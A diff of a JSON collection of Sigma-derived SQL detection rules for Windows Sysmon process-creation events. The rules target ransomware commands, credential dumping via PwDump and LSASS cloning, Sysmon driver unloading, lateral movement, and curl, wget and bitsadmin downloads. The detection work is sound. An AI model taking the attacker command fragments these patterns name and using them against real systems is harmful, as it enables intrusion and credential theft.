@@ -6807,90 +6637,86 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.impact", + 
"attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' 
ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN 
('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "status": "test", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "System administrator usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Suspicious Invoke-WebRequest Execution", + "id": 
"5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE 
'\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { "title": "Suspicious Child Process Created as System", 
@@ -6912,581 +6738,540 @@ "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. 
Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": 
"4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", - "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of a renamed binary often 
used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Winrar Compressing Dump 
Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR 